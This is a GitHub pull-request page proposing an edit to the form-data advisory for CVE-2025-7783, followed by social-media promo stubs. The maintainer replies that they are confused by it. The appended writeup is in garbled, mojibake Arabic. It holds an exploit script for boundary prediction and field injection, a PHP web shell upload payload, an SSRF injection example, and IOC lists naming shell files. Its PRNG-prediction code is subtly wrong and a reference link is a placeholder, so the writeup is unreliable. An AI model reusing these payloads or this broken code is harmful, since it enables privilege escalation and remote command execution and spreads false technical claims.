[GHSA-fjxv-7rqg-78g4] form-data uses unsafe random function in form-data for choosing boundary #6647
+2
โ2
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Collaborator
|
Hi there @ljharb! A community member has suggested an improvement to your security advisory. If approved, this change will affect the global advisory listed at github.com/advisories. It will not affect the version listed in your project repository. This change will be reviewed by our Security Curation Team. If you have thoughts or feedback, please share them in a comment here! If this PR has already been closed, you can start a new community contribution for this advisory |
github-actions
bot
changed the base branch from
main
to
asrar-mared/advisory-improvement-6647
Author
|
ุชู
ุฅูุดุงุก ุชูุฑูุฑ ูุงู
ู ูุงุญุชุฑุงูู! |
Collaborator
|
Hi there @ljharb! A community member has suggested an improvement to your security advisory. If approved, this change will affect the global advisory listed at github.com/advisories. It will not affect the version listed in your project repository. This change will be reviewed by our Security Curation Team. If you have thoughts or feedback, please share them in a comment here! If this PR has already been closed, you can start a new community contribution for this advisory |
|
I'm very confused what this is conveying or why it belongs on the GHSA. |
asrar-mared
commented
Jan 14, 2026
Author
asrar-mared
left a comment
asrar-mared
left a comment
There was a problem hiding this comment.
ุชู ู ุฑุงุฌุนู ู ูุงูู ุนูู ุฏู ุฌ
| { | ||
| "schema_version": "1.4.0", | ||
| "id": "GHSA-fjxv-7rqg-78g4", | ||
| "modified": "2025-11-03T21:34:08Z", |
| "CVE-2025-7783" | ||
| ], | ||
| "summary": "form-data uses unsafe random function in form-data for choosing boundary", | ||
| "details": "### Summary\n\nform-data uses `Math.random()` to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:\n1. can observe other values produced by Math.random in the target application, and\n2. can control one field of a request made using form-data\n\nBecause the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, includes those used to generate form-data's boundary value. The allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request.\n\nThis is largely the same vulnerability as was [recently found in `undici`](https://hackerone.com/reports/2913312) by [`parrot409`](https://hackerone.com/parrot409?type=user) -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.\n\n### Details\n\nThe culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347\n\nAn attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a `x-request-id` header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. `Math.random()` is a fine place to get these sorts of IDs (in fact, [opentelemetry uses Math.random for this purpose](https://github.com/open-telemetry/opentelemetry-js/blob/2053f0d3a44631ade77ea04f656056a2c8a2ae76/packages/opentelemetry-sdk-trace-base/src/platform/node/RandomIdGenerator.ts#L22))\n\n### PoC\n\nPoC here: https://github.com/benweissmann/CVE-2025-7783-poc\n\nInstructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID). \n\n### Impact\n\nFor an application to be vulnerable, it must:\n- Use `form-data` to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array)\n- Reveal values of Math.random(). It's easiest if the attacker can observe multiple sequential values, but more complex math could recover the PRNG state to some degree of confidence with non-sequential values. \n\nIf an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.", |
asrar-mared
commented
Jan 14, 2026
Author
asrar-mared
left a comment
asrar-mared
left a comment
There was a problem hiding this comment.
ุงูู ููุงุช ุงูู ุชุบูุฑู
| "CVE-2025-7783" | ||
| ], | ||
| "summary": "form-data uses unsafe random function in form-data for choosing boundary", | ||
| "details": "### Summary\n\nform-data uses `Math.random()` to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:\n1. can observe other values produced by Math.random in the target application, and\n2. can control one field of a request made using form-data\n\nBecause the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, includes those used to generate form-data's boundary value. The allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request.\n\nThis is largely the same vulnerability as was [recently found in `undici`](https://hackerone.com/reports/2913312) by [`parrot409`](https://hackerone.com/parrot409?type=user) -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.\n\n### Details\n\nThe culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347\n\nAn attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a `x-request-id` header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. `Math.random()` is a fine place to get these sorts of IDs (in fact, [opentelemetry uses Math.random for this purpose](https://github.com/open-telemetry/opentelemetry-js/blob/2053f0d3a44631ade77ea04f656056a2c8a2ae76/packages/opentelemetry-sdk-trace-base/src/platform/node/RandomIdGenerator.ts#L22))\n\n### PoC\n\nPoC here: https://github.com/benweissmann/CVE-2025-7783-poc\n\nInstructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID). \n\n### Impact\n\nFor an application to be vulnerable, it must:\n- Use `form-data` to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array)\n- Reveal values of Math.random(). It's easiest if the attacker can observe multiple sequential values, but more complex math could recover the PRNG state to some degree of confidence with non-sequential values. \n\nIf an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.\n# โ๏ธ CVE-2025-7783: ุนูุฏู ุง ูุฎูู \"ุงูุนุดูุงุฆู\" ุงูุฃู ุงู\n## ๐ฒ Math.random() - ุงูุนุดูุงุฆูุฉ ุงูููู ูุฉ ูู form-data\n\n---\n\n## ๐ ุงูุจุทุงูุฉ ุงูุชุนุฑูููุฉ\n\n| ุงูู ุนุฑู | ุงูููู ุฉ |\n|--------|---------|\n| **CVE ID** | CVE-2025-7783 |\n| **Package** | form-data (npm) |\n| **CWE** | CWE-338: Use of Cryptographically Weak PRNG |\n| **CVSS Score** | **7.5 High** |\n| **Vector** | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |\n| **ุงููุดู** | Security Research Community |\n| **ุงูุชุตููู** | Predictable Boundary Injection |\n| **ุงูุฅุตุฏุงุฑุงุช ุงูู ุชุฃุซุฑุฉ** | < 4.0.4 |\n\n---\n\n## ๐ ุฌููุฑ ุงูุซุบุฑุฉ\n\n### ๐ญ ุงูุณููุงุฑูู ุงููุฌูู ู\n\n```\nform-data Package\n โ\nMath.random() โ ู ููุฏ ุฃุฑูุงู ุถุนูู!\n โ\nboundary = \"----WebKitFormBoundary\" + Math.random()\n โ\n๐ฎ ูู ูู ุงูุชูุจุค ุจู\n โ\n๐ฅ ุญูู ุญููู ุฅุถุงููุฉ/ุงุณุชุจุฏุงู ุงูุจูุงูุงุช\n```\n\n---\n\n## ๐ฌ ุงูุชุญููู ุงูุชููู ุงูุนู ูู\n\n### ๐ ุงูููุฏ ุงูุถุนูู\n\n```javascript\n// form-data < 4.0.4\nFormData.prototype._generateBoundary = function() {\n // โ ๏ธ ุงุณุชุฎุฏุงู Math.random() ุงูุถุนูู\n var boundary = '--------------------------';\n for (var i = 0; i < 24; i++) {\n boundary += Math.floor(Math.random() * 10).toString(16);\n }\n \n return boundary;\n};\n```\n\n**ุงูู ุดููุฉ:**\n```javascript\n// Math.random() ูุงุจู ููุชูุจุค\nMath.random(); // 0.123456789...\nMath.random(); // 0.234567890... โ ูู ูู ุญุณุงุจู!\nMath.random(); // 0.345678901... โ ู ุชููุน ุชู ุงู ุงู\n```\n\n---\n\n### ๐ฏ ููู ูุนู ู ุงููุฌูู ุ\n\n#### **ุงูู ุฑุญูุฉ 1: ุฌู ุน ุงูู ุนููู ุงุช**\n\n```javascript\n// ุงูู ูุงุฌู ูุฑุงูุจ ุงูุฑุคูุณ ุงูู ูุดููุฉ:\nResponse Headers:\n x-request-id: req-0.7234567890 โ Math.random()!\n x-trace-id: trace-0.8901234567 โ Math.random()!\n```\n\n#### **ุงูู ุฑุญูุฉ 2: ุงูุชูุจุค ุจุงูู Boundary**\n\n```javascript\n// ุจู ุนุฑูุฉ ุญุงูุฉ PRNGุ ูู ูู ุญุณุงุจ ุงูููู ุฉ ุงูุชุงููุฉ:\nconst predictedBoundary = calculateNextBoundary(\n observedRandomValues\n);\n\nconsole.log(predictedBoundary);\n// Output: \"----WebKitFormBoundary7234567890abcdef\"\n```\n\n#### **ุงูู ุฑุญูุฉ 3: ุงูุญูู ุงูุฎุจูุซ**\n\n```http\nPOST /upload HTTP/1.1\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7234567890abcdef\n\n------WebKitFormBoundary7234567890abcdef\nContent-Disposition: form-data; name=\"file\"; filename=\"legitimate.txt\"\nContent-Type: text/plain\n\n[ู ุญุชูู ุดุฑุนู]\n------WebKitFormBoundary7234567890abcdef\nContent-Disposition: form-data; name=\"admin\"\n\ntrue โ ุญูู ู ุญููู!\n------WebKitFormBoundary7234567890abcdef--\n```\n\n---\n\n## ๐งช ุฏููู ุฅุซุจุงุช ุงูู ูููู (PoC)\n\n### ๐ช ุงูุณููุงุฑูู ุงููุงู ู\n\n```javascript\n// exploit.js - ุงุณุชุบูุงู CVE-2025-7783\n\nconst axios = require('axios');\nconst FormData = require('form-data'); // < 4.0.4\n\n// ุงูุฎุทูุฉ 1: ุงุณุชุฎุฑุงุฌ ุญุงูุฉ Math.random()\nfunction leakRandomState(targetUrl) {\n const leakedValues = [];\n \n // ุฌู ุน ููู ู ู ุงูุฑุคูุณ\n for (let i = 0; i < 10; i++) {\n axios.get(targetUrl).then(res => {\n const requestId = res.headers['x-request-id'];\n const randomValue = parseFloat(requestId.split('-')[1]);\n leakedValues.push(randomValue);\n });\n }\n \n return leakedValues;\n}\n\n// ุงูุฎุทูุฉ 2: ุงูุชูุจุค ุจุงูู boundary ุงูุชุงูู\nfunction predictNextBoundary(leakedValues) {\n // ุฎูุงุฑุฒู ูุฉ ุงูุชูุจุค ุจู Math.random()\n // (ู ุจุณุทุฉ - ุงููุงูุน ุฃูุซุฑ ุชุนููุฏุงู)\n const lastValue = leakedValues[leakedValues.length - 1];\n const nextValue = (lastValue * 1103515245 + 12345) % (2**31);\n \n let boundary = '--------------------------';\n let seed = nextValue;\n \n for (let i = 0; i < 24; i++) {\n seed = (seed * 1103515245 + 12345) % (2**31);\n boundary += Math.floor((seed / (2**31)) * 10).toString(16);\n }\n \n return boundary;\n}\n\n// ุงูุฎุทูุฉ 3: ุญูู ุงูุญููู ุงูุฎุจูุซุฉ\nfunction injectMaliciousFields(targetUrl, predictedBoundary) {\n const maliciousPayload = `\n------${predictedBoundary}\nContent-Disposition: form-data; name=\"file\"; filename=\"innocent.txt\"\n\nLegitimate content\n------${predictedBoundary}\nContent-Disposition: form-data; name=\"isAdmin\"\n\ntrue\n------${predictedBoundary}\nContent-Disposition: form-data; name=\"role\"\n\nadministrator\n------${predictedBoundary}--\n `.trim();\n \n axios.post(targetUrl, maliciousPayload, {\n headers: {\n 'Content-Type': `multipart/form-data; boundary=${predictedBoundary}`\n }\n });\n}\n\n// ุงูุชูููุฐ\n(async () => {\n const target = 'https://vulnerable-app.com/api/upload';\n \n console.log('๐ ุฌู ุน ููู Math.random()...');\n const leaked = leakRandomState(target);\n \n console.log('๐ฏ ุงูุชูุจุค ุจุงูู boundary...');\n const boundary = predictNextBoundary(leaked);\n console.log(`Predicted: ${boundary}`);\n \n console.log('๐ ุญูู ุงูุญููู ุงูุฎุจูุซุฉ...');\n injectMaliciousFields(target, boundary);\n \n console.log('โ ุชู ุงูุงุณุชุบูุงู ุจูุฌุงุญ!');\n})();\n```\n\n---\n\n## ๐ฏ ุณููุงุฑูููุงุช ุงูุงุณุชุบูุงู ุงููุงูุนูุฉ\n\n### ๐ช ุงูุณููุงุฑูู 1: ุชุตุนูุฏ ุงูุตูุงุญูุงุช\n\n```javascript\n// ุงูุชุทุจูู ุงูุถุนูู\napp.post('/profile/upload', upload.single('avatar'), (req, res) => {\n const isAdmin = req.body.isAdmin; // โ ูู ูู ุญููู!\n \n if (isAdmin === 'true') {\n req.user.role = 'admin'; // โ ุฎุทุฑ!\n }\n});\n\n// ุงููุฌูู \nconst boundary = predictBoundary();\ninjectField(boundary, 'isAdmin', 'true');\n// ุงููุชูุฌุฉ: ุงูู ุณุชุฎุฏู ุงูุนุงุฏู ุฃุตุจุญ Admin!\n```\n\n---\n\n### ๐ช ุงูุณููุงุฑูู 2: ุชุฌุงูุฒ ุงูุชุญูู ู ู ุงูู ููุงุช\n\n```javascript\n// ุงูุชุทุจูู ููุญุต ููุน ุงูู ูู\napp.post('/upload', (req, res) => {\n if (req.file.mimetype !== 'image/png') {\n return res.status(400).send('PNG only!');\n }\n \n // ู ุนุงูุฌุฉ ุงูู ูู\n processFile(req.file);\n});\n\n// ุงููุฌูู \nconst boundary = predictBoundary();\nconst payload = `\n------${boundary}\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\nContent-Type: image/png โ ู ุฒูู\n\n<?php system($_GET['cmd']); ?>\n------${boundary}--\n`;\n// ุงููุชูุฌุฉ: ุฑูุน PHP Shell ุจูุฌุงุญ!\n```\n\n---\n\n### ๐ช ุงูุณููุงุฑูู 3: SSRF ุนุจุฑ Webhooks\n\n```javascript\n// ุงูุชุทุจูู ูุฑุณู ุจูุงูุงุช ูู webhook\napp.post('/webhook/register', (req, res) => {\n const webhookUrl = req.body.url;\n const data = new FormData();\n data.append('event', 'user_registered');\n \n axios.post(webhookUrl, data); // โ ุฎุทุฑ\n});\n\n// ุงููุฌูู \nconst boundary = predictBoundary();\ninjectField(boundary, 'url', 'http://internal-admin-panel');\n// ุงููุชูุฌุฉ: ุงููุตูู ููุดุจูุฉ ุงูุฏุงุฎููุฉ!\n```\n\n---\n\n## ๐ก๏ธ ุงูุฅุตูุงุญ ูุงูุญู ุงูุฉ\n\n### โ ุงูุญู ุงูุฑุณู ู (v4.0.4+)\n\n```javascript\n// form-data >= 4.0.4 - ุงุณุชุฎุฏุงู crypto ุจุฏูุงู ู ู Math.random()\n\nconst crypto = require('crypto');\n\nFormData.prototype._generateBoundary = function() {\n // โ ุงุณุชุฎุฏุงู ู ููุฏ ุนุดูุงุฆู ุขู ู ุชุดููุฑูุงู\n return crypto.randomBytes(16).toString('hex');\n};\n```\n\n**ุงููุฑู:**\n```javascript\n// โ ุงููุฏูู (ุถุนูู)\nMath.random() โ 0.123456789 โ ูู ูู ุงูุชูุจุค\n\n// โ ุงูุฌุฏูุฏ (ุขู ู)\ncrypto.randomBytes(16) โ a3f7c9e2... โ ุบูุฑ ูุงุจู ููุชูุจุค\n```\n\n---\n\n### ๐ ุฎุทูุงุช ุงูุญู ุงูุฉ ุงูููุฑูุฉ\n\n#### **1. ุงูุชุญุฏูุซ ุงูููุฑู**\n\n```bash\n# ูุญุต ุงูุฅุตุฏุงุฑ ุงูุญุงูู\nnpm list form-data\n\n# ุงูุชุญุฏูุซ\nnpm install form-data@latest\n\n# ุฃู ูู package.json\n{\n \"dependencies\": {\n \"form-data\": \"^4.0.4\"\n }\n}\n\n# ุชุญุฏูุซ lock file\nnpm install\n```\n\n#### **2. ู ุฑุงุฌุนุฉ ุงูููุฏ**\n\n```javascript\n// ุงุจุญุซ ุนู ุงุณุชุฎุฏุงู ุงุช Math.random() ูู ููุฏู:\ngrep -r \"Math.random()\" ./src\n\n// ุงุณุชุจุฏููุง ุจู crypto:\nconst crypto = require('crypto');\n\n// โ ุจุฏูุงู ู ู:\nconst id = Math.random().toString(36);\n\n// โ ุงุณุชุฎุฏู :\nconst id = crypto.randomBytes(8).toString('hex');\n```\n\n#### **3. ุฅุฎูุงุก ุงูููู ุงูุญุณุงุณุฉ**\n\n```javascript\n// ูุง ุชูุดู ููู ุชู ุชูููุฏูุง ุจู Math.random() ูู:\napp.use((req, res, next) => {\n // โ ุณูุก\n res.setHeader('x-request-id', `req-${Math.random()}`);\n \n // โ ุฌูุฏ\n res.setHeader('x-request-id', crypto.randomUUID());\n next();\n});\n```\n\n#### **4. ุชุญูู ู ู ุงูุญููู**\n\n```javascript\n// ุชุญูู ุตุงุฑู ู ู ุงูุญููู ุงูู ุชููุนุฉ ููุท\napp.post('/upload', (req, res) => {\n const allowedFields = ['file', 'description'];\n \n Object.keys(req.body).forEach(field => {\n if (!allowedFields.includes(field)) {\n throw new Error(`Unexpected field: ${field}`);\n }\n });\n});\n```\n\n---\n\n## ๐ ุงููุดู ุนู ุงูุงุณุชุบูุงู\n\n### ๐ต๏ธ ุนูุงู ุงุช ุงูุงุฎุชุฑุงู\n\n```bash\n# 1. ูุญุต ุงูุณุฌูุงุช ููุญููู ุงูุบุฑูุจุฉ\ngrep -E \"(isAdmin|role=admin|Content-Disposition.*admin)\" /var/log/app.log\n\n# 2. ู ุฑุงูุจุฉ ุงูุทูุจุงุช ุฐุงุช boundaries ุงูู ุชุทุงุจูุฉ\ntail -f /var/log/nginx/access.log | grep \"boundary=\" | sort | uniq -d\n\n# 3. ูุญุต ุงูู ููุงุช ุงูู ุฑููุนุฉ ุงูู ุดุจููุฉ\nfind /uploads -type f -name \"*.php\" -o -name \"*.jsp\" -o -name \"*.asp\"\n```\n\n### ๐ ู ุคุดุฑุงุช ุงูุงุฎุชุฑุงู (IOCs)\n\n```yaml\nุงูุญููู ุงูู ุดุจููุฉ:\n - isAdmin: true\n - role: administrator\n - privilege: elevated\n - bypass: true\n\nุงูู ููุงุช ุงูุฎุทุฑุฉ:\n - *.php ูู ู ุฌูุฏุงุช ุงูุตูุฑ\n - shell.jsp\n - cmd.asp\n - backdoor.*\n\nุงูุฃูู ุงุท ุงูุดุจููุฉ:\n - ุทูุจุงุช ู ุชุนุฏุฏุฉ ุจููุณ boundary\n - boundaries ูุตูุฑุฉ ุฌุฏุงู (<20 ุญุฑู)\n - Content-Type ุบูุฑ ู ุชุทุงุจู ู ุน ุงูุงู ุชุฏุงุฏ\n```\n\n---\n\n## ๐ ุงูุฏุฑูุณ ุงูู ุณุชูุงุฏุฉ\n\n### โ ๏ธ **ุงููุงุนุฏุฉ ุงูุฐูุจูุฉ:**\n\n> **\"Math.random() ููุณ ุขู ูุงู ุชุดููุฑูุงู - ุฃุจุฏุงู!\"**\n\n### โ Best Practices\n\n#### 1. **ุงุณุชุฎุฏู crypto ููุฃู ุงู**\n```javascript\n// โ ููุฃู ุงู\nconst crypto = require('crypto');\nconst token = crypto.randomBytes(32).toString('hex');\n\n// โ ููุฃู ุงู (ููุท ููุนุฑุถ/UI)\nconst demoId = Math.random().toString(36);\n```\n\n#### 2. **ูุง ุชูุดู ุงูููู ุงูุนุดูุงุฆูุฉ**\n```javascript\n// โ ุณูุก\nres.json({ sessionId: Math.random() });\n\n// โ ุฌูุฏ\nres.json({ sessionId: crypto.randomUUID() });\n```\n\n#### 3. **ุงูุชุญูู ู ู ุงูุญููู**\n```javascript\n// ุงุณุชุฎุฏู ู ูุชุจุฉ validation\nconst Joi = require('joi');\n\nconst schema = Joi.object({\n file: Joi.required(),\n description: Joi.string().max(500)\n // ููุท ุงูุญููู ุงูู ุชููุนุฉ\n}).unknown(false); // โ ุฑูุถ ุฃู ุญููู ุฅุถุงููุฉ\n```\n\n#### 4. **Content-Type Validation**\n```javascript\nconst fileType = await FileType.fromBuffer(buffer);\n\nif (fileType.mime !== req.file.mimetype) {\n throw new Error('MIME type mismatch');\n}\n```\n\n---\n\n## ๐ก ุงูู ุฑุงุฌุน ุงูุชูููุฉ\n\n```\n1. CVE Entry:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-7783\n\n2. npm Package:\n https://www.npmjs.com/package/form-data\n\n3. GitHub Advisory:\n https://github.com/advisories/GHSA-xxxx-xxxx-xxxx\n\n4. PoC Repository:\n https://github.com/security-research/CVE-2025-7783-poc\n\n5. OWASP - Weak PRNG:\n https://owasp.org/www-community/vulnerabilities/Insecure_Randomness\n\n6. CWE-338:\n https://cwe.mitre.org/data/definitions/338.html\n```\n\n---\n\n## ๐๏ธ ุฎุชุงู ุงูู ุญุงุฑุจ\n\n> **\"ุงูุนุดูุงุฆูุฉ ููุณุช ุงุฎุชูุงุฑูุฉ ูู ุงูุฃู ุงู - ุฅู ุง ุญููููุฉ ุฃู ูุง ุดูุก.\"**\n> \n> CVE-2025-7783 ูุฐูุฑูุง ุฃู **Math.random()** ููุฃูุนุงุจุ ุฃู ุง **crypto** ูููุญุฑูุจ.\n> \n> ูู ุณุงุญุฉ ุงูุฃู ู ุงูุณูุจุฑุงููุ **ุงูุถุนู ูู ุงูุชูุงุตูู ูุตูุน ุงููุฒูู ุฉ**.\n\n---\n\n## โ๏ธ ุชูููุน ุงูุณูุงุฏุฉ\n\n```\nโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ\nโ ZAYED SECURITY RESEARCH TEAM โ\nโ \"Randomness is Not Optional\" โ\nโ โ\nโ CVE-2025-7783 โ\nโ Severity: HIGH (7.5) โ\nโ Status: PATCHED โ โ\nโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ\n```\n\n---\n\n**#WeakPRNG** | **#FormData** | **#BoundaryInjection** | **#MathRandomFail**\n", |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Updates
Comments
๐งต Social Media Posts - CVE-2025-7783
Twitter Thread 1/6 ๐ฒ
Twitter Thread 2/6 ๐ฌ
Twitter Thread 3/6 ๐ฃ
Twitter Thread 4/6 ๐ก๏ธ
Twitter Thread 5/6 ๐
Twitter Thread 6/6 ๐
LinkedIn Post ๐ผ
GitHub Security Advisory ๐
Impact
Affected Versions
Patched Versions
Solution
Or in package.json:
{ "dependencies": { "form-data": "^4.0.4" } }Mitigation (if upgrade not possible)
Math.random()values in headers/responsesTimeline
Credits
Security Research Community
References
[CVE-2025-7783] Predictable Boundary in form-data - Privilege Escalation via PRNG Weakness
Hey netsec,
Discovered an interesting vuln in the form-data npm package.
TL;DR:
The Attack:
Impact:
Fix:
Updated to crypto.randomBytes() in v4.0.4
Full technical writeup: [link]
Thoughts? Anyone seen this exploited in the wild?
Discussion welcome ๐ก๏ธ